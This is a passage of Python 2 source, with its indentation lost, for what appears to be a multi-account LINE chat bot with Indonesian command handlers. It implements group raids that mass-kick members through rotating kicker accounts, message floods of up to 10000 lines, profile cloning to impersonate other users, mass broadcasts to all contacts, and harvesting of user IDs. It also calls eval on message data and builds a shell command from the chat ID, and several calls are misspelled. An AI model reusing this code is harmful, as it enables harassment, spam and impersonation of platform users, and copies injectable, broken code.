cl.sendText(msg.to, str (e))
#===============================================
elif msg.text in ["debug speed","Debug speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Blacklist all" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Blacklist all","")
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"Semua Telah Di Hapus")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Maaf")
else:
for target in targets:
if not target in Bots:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Boss")
except:
cl.sentText(msg.to,"Berhasil Dihapus")
elif msg.text in ["Ban cek","Cekban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = "[⎈]Mid Blacklist [⎈]"
for mm in matched_list:
cocoa += "\n" + mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif "Details grup: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("/DetailsGroup: ","")
if gid in [""," "]:
cl.sendText(msg.to,"Grup id tidak valid")
else:
try:
groups = cl.getGroup(gid)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h = "[" + groups.name + "]\n -+GroupID : " + gid + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName + "\n -+GroupPicture : http://dl.profile.line.naver.jp/" + groups.pictureStatus
cl.sendText(msg.to,h)
except Exception as error:
cl.sendText(msg.to,(error))#-------------------------------------------------------
#--------------------------------------------------------
elif "Ban group: " in msg.text:
grp = msg.text.replace("Ban group: ","")
gid = cl.getGroupIdsJoined()
if msg.from_ in admin:
for i in gid:
h = cl.getGroup(i).name
if h == grp:
wait["BlGroup"][i]=True
cl.sendText(msg.to, "Success Ban Group : "+grp)
else:
pass
else:
cl.sendText(msg.to, "Khusus admin")
#--------------------------------------------------------
elif msg.text in ["List ban","List ban group"]:
if msg.from_ in admin:
if wait["BlGroup"] == {}:
ki.sendText(msg.to,"nothing")
kk.sendText(msg.to,"nothing")
kc.sendText(msg.to,"nothing")
else:
mc = ""
for gid in wait["BlGroup"]:
mc += "-> " +cl.getGroup(gid).name + "\n"
ki.sendText(msg.to,"===[Ban Group]===\n"+mc)
else:
cl.sendText(msg.to, "Khusus Admin")
#--------------------------------------------------------
elif msg.text in ["Del ban: "]:
if msg.from_ in admin:
ng = msg.text.replace("Del ban: ","")
for gid in wait["BlGroup"]:
if cl.getGroup(gid).name == ng:
del wait["BlGroup"][gid]
cl.sendText(msg.to, "Success del ban "+ng)
else:
pass
else:
cl.sendText(msg.to, "Khusus Admin")
#--------------------------------------------------------
elif "Join group: " in msg.text:
ng = msg.text.replace("Join group: ","")
gid = cl.getGroupIdsJoined()
try:
if msg.from_ in Creator:
for i in gid:
h = cl.getGroup(i).name
if h == ng:
cl.inviteIntoGroup(i,[Creator])
cl.sendText(msg.to,"Success join to ["+ h +"] group")
else:
pass
else:
cl.sendText(msg.to,"Khusus Creator")
except Exception as e:
cl.sendMessage(msg.to, str(e))
#--------------------------------------------------------
elif "Leave group: " in msg.text:
ng = msg.text.replace("Leave group: ","")
gid = cl.getGroupIdsJoined()
if msg.from_ in Creator:
for i in gid:
h = cl.getGroup(i).name
if h == ng:
cl.sendText(i,"Bot di paksa keluar oleh owner!")
cl.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
cl.sendText(msg.to,"Success left ["+ h +"] group")
else:
pass
else:
cl.sendText(msg.to,"Khusus Creator")
elif "Set member: " in msg.text:
if msg.from_ in admin:
jml = msg.text.replace("Set member: ","")
wait["Members"] = int(jml)
cl.sendText(msg.to, "Jumlah minimal member telah di set : "+jml)
else:
cl.sendText(msg.to, "Khusus Admin")
#--------------------------------------------------------
elif "Add all" in msg.text:
if msg.from_ in admin:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.findAndAddContactsByMids(mi_d)
cl.sendText(msg.to,"Success Add all")
else:
cl.sendText(msg.to, "Khusus Admin")
#--------------------------------------------------------
elif "Recover" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Recover", mi_d)
cl.sendText(msg.to,"Success recover")
elif "Ulti " in msg.text:
if msg.from_ in admin:
ulti0 = msg.text.replace("Ulti ","")
ulti1 = ulti0.rstrip()
ulti2 = ulti1.replace("@","")
ulti3 = ulti2.rstrip()
_name = ulti3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
nl.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets ==[]:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
nl.kickoutFromGroup(msg.to,[target])
nl.leaveGroup(msg.to)
print (msg.to,[g.mid])
except:
nl.sendText(msg.t,"Ter ELIMINASI....")
nl.sendText(msg.to,"WOLES brooo....!!!")
nl.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.uldateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
elif msg.text in ["Speed","Sp"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "loading.....")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
kc.sendText(msg.to, "%sseconds" % (elapsed_time))
ks.sendText(msg.to, "%sseconds" % (elapsed_time))
kt.sendText(msg.to, "%sseconds" % (elapsed_time))
#========================================
elif msg.text in ["Bot1 backup run"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot6 backup run"]:
if msg.from_ in admin:
wek = kt.getContact(Emid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydnsgv.txt',"w")
s.write(r)
s.close()
t = open('jhmysm.txt',"w")
t.write(i)
t.close()
u = open('myiyps.txt',"w")
u.write(a)
u.close()
kt.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
elif "Bot1 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
elif "Bot6 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kt.getContact(target)
X = contact.displayName
profile = kt.getProfile()
profile.displayName = X
kt.updateProfile(profile)
kt.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kt.getProfile()
lol.statusMessage = Y
kt.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kt.updateProfilePicture(P)
except Exception as e:
kt.sendText(msg.to, "Failed!")
print e
#=================================================
elif "Bot1 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
elif "Bot6 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydnsgv.txt',"r")
name = h.read()
h.close()
x = name
profile = kt.getProfile()
profile.displayName = x
kt.updateProfile(profile)
i = open('jhmysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kt.getProfile()
cak.statusMessage = y
kt.updateProfile(cak)
j = open('myiyps.txt',"r")
ps = j.read()
j.close()
p = ps
kt.updateProfilePicture(p)
kt.sendText(msg.to, "Succes")
except Exception as e:
kt.sendText(msg.to,"Gagagl!")
print e
#=================================================
elif msg.text == "Lurking":
if msg.from_ in admin:
cl.sendText(msg.to, "Set point.")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "Lurking result":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "╔═══════════════%s\n╠════════════════\n%s╠═══════════════\n║Readig point creation:\n║ [%s]\n╚════════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "anda slah ketik-_-")
#========================================
#---------------FUNGSI RATAIN GRUP TANPA KICK SESAMA BOT/Admin/Bots----------#
elif "Cleanse" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("Cleanse","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki,kk,kc,ks,kt]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
#================================================
#========================================
elif msg.text.lower() == 'welcome':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#=========================================
elif msg.text in ["Mimic on","mimic on"]:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic:off"]:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list"]:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#=======================================
#-------------------Fungsi spam start--------------------------
elif "Spam change:" in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam change:","")
cl.sendText(msg.to,"spam changed")
elif "Spam add:" in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam add:","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"spam changed")
else:
cl.sendText(msg.to,"Done")
elif "Spam:" in msg.text:
if msg.from_ in admin:
strnum = msg.text.replace("Spam:","")
num = int(strnum)
for var in range(0,num):
cl.sendText(msg.to, wait["spam"])
#-------------------Fungsi spam finish----------------------------
#-----------------------------------------------
#-----------------------------------------------
elif 'apakah' in msg.text.lower():
if msg.from_ in admin:
tanya = msg.text.lower().replace("apakah","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
#================================================
#===============================================
#=================================================
elif "Spamg " in msg.text:
if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spamg "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------------------------------------
elif "Steal mid @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Steal mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#========================================
elif msg.text in ["Join all"]:
if msg.from_ in admin:
G = cl.getGroup(msg.to)
info = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kt.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "All_Kickers_Ok!"
G.preventJoinByTicket(G)
cl.updateGroup(G)
#=====================================================================================
elif msg.text in ["Bye allgroups"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
ks.leaveGroup(i)
kt.leaveGroup(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"bye-bye")
else:
ki.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Bye all"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
kt.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Center @bye"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
try:
cl.sendMessage(msg.to,"bye-bye")
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Nk "]:
if msg.from_ in admin:
mk0 = msg.text.replace("Nk ","")
mk1 = mk0.lstrip()
mk2 = mk1.replace("@","")
mk3 = mk2.rstrip()
_name = mk3
gs = ki.getGroup(msg.to)
targets = []
for h in gs.members:
if _name in h.displayName:
targets.append(h.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
if msg.from_ not in target:
ki.kickoutFromGroup(msg.to,[target])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
#==========================================
elif "youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#-------------------------------------------------
elif "/say-jp " in msg.text:
say = msg.text.replace("/say-jp ","")
lang = 'jp'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
#------------------------------------------------
elif "/say-en " in msg.text:
say = msg.text.replace("/say-en ","")
lang = 'en'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
#-----------------------------------------------
elif "/say " in msg.text:
psn = msg.text.replace("/say ","")
tts = gTTS(psn, lang='id', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
#-----------------------------------------------
elif "Siapa " in msg.text:
tanya = msg.text.replace("Siapa ","")
jawab = ("Dia yg kebanyakan micin"," Dia gila")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='en')
tts.save('tts.mp3')
cl.sendAudio(msg.to,'tts.mp3')
#==========================================
elif "Dosa @" in msg.text:
tanya = msg.text.replace("Dosa @","")
jawab = ("60%","70%","80%","90%","100%","Tak terhingga")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='en')
tts.save('tts.mp3')
cl.sendText(msg.to,"Dosanya adalah cek voie ini")
cl.sendAudio(msg.to,'tts.mp3')
#==========================================
#==========================================
elif "/ " in msg.text.lower():
txt = msg.text.replace("kedapkedip ", "")
t1 = "\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xb0\x82\xf4\x80\xa0\x81\xf4\x80\xa0\x81\xf4\x80\xa0\x81"
t2 = "\xf4\x80\x82\xb3\xf4\x8f\xbf\xbf"
cl.sendText(msg.to, t1 + txt + t2)
#-------Cek sider biar mirip kek siri-----------------------------
elif "Setlastpoint" in msg.text:
subprocess.Popen("echo '' > dataSeen/"+msg.to+".txt", shell=True, stdout=subprocess.PIPE)
#cl.sendText(msg.to, "Checkpoint checked!")
cl.sendText(msg.to, "Set the lastseens' point(`・ω・´)\n\n" + datetime.now().strftime('%H:%M:%S'))
print "Setlastpoint"
#--------------------------------------------
elif "Viewlastseen" in msg.text:
lurkGroup = ""
dataResult, timeSeen, contacts, userList, timelist, recheckData = [], [], [], [], [], []
with open('dataSeen/'+msg.to+'.txt','r') as rr:
contactArr = rr.readlines()
for v in xrange(len(contactArr) -1,0,-1):
num = re.sub(r'\n', "", contactArr[v])
contacts.append(num)
pass
contacts = list(set(contacts))
for z in range(len(contacts)):
arg = contacts[z].split('|')
userList.append(arg[0])
timelist.append(arg[1])
uL = list(set(userList))
for ll in range(len(uL)):
try:
getIndexUser = userList.index(uL[ll])
timeSeen.append(time.strftime("%d日 %H:%M:%S", time.localtime(int(timelist[getIndexUser]) / 1000)))
recheckData.append(userList[getIndexUser])
except IndexError:
conName.append('nones')
pass
contactId = cl.getContacts(recheckData)
for v in range(len(recheckData)):
dataResult.append(contactId[v].displayName + ' ('+timeSeen[v]+')')
pass
if len(dataResult) > 0:
grp = '\n• '.join(str(f) for f in dataResult)
total = '\nThese %iuesrs have seen at the lastseen\npoint(`・ω・´)\n\n%s' % (len(dataResult), datetime.now().strftime('%H:%M:%S') )
cl.sendText(msg.to, "• %s %s" % (grp, total))
else:
cl.sendText(msg.to, "Sider ga bisa di read cek setpoint dulu bego tinggal ketik\nSetlastpoint\nkalo mau liat sider ketik\nViewlastseen")
print "Viewlastseen"
#==========================================
elif msg.text in ["Purge"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"group purge")
return
for jj in matched_list:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
#-----------------------------------------------------------
elif "Ban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[BL]ok"
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Masuk daftar orang bejat Boss")
except:
cl.sendText(msg.to,"Error")
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[WL]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
